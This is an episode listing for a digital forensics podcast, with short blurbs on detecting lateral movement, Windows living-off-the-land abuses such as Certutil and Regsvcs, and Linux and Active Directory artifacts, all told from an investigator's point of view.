
DFSP # 411 - NTLM Credential Validation
This week I'm talking about detecting evidence of lateral movement on Window systems using NTLM credential validation events. Much like the episode I did on Kerberos, NTLM events offer the same advant...
2 Jan 202418min

DFSP # 410 - Linux Temp Directories
Temporary directories play a significant role in computer forensic investigations as they can potentially contain valuable digital evidence. When conducting a computer forensic investigation, these te...
26 Des 202315min

DFSP # 409 - Regsvcs and Regasm Abuse
This week I'm talking about Regsvcs /Regasm exploitation, which is a Windows tactic attackers use to evade defense mechanisms and execute code. Specifically, this technique can be used to bypass proce...
19 Des 202311min

DFSP # 408 - Nesting
This week I'm talking about Nested Groups and the risk they pose for security. Built-in to the functionality of Active Directory is the ability to attach a group to another group. While this has advan...
12 Des 202313min

DFSP # 407 - More About Lateral Movement and Kerberos
This week it's more about lateral movement and kerberos events.
5 Des 202319min

DFSP # 406 - All the BIN Directories
In a typical Linux "bin" directory, you can find various types of executable files and scripts that are used to perform different tasks. The confusing part is that there are a number of different BIN ...
28 Nov 202314min

DFSP # 405 - Werfault Attacks
Werfault is in interesting artifact in that there is not a lot of documentation on it but yet it may affect an investigation in different ways. Its appearance in logs sometimes adds a bit of confusio...
21 Nov 202314min

DFSP # 404 - Certutil Attacks
Certutil, a powerful command-line utility, possesses the potential for misuse by malicious actors to establish illicit network connections. Therefore, it is crucial to familiarize oneself with its leg...
14 Nov 202312min


















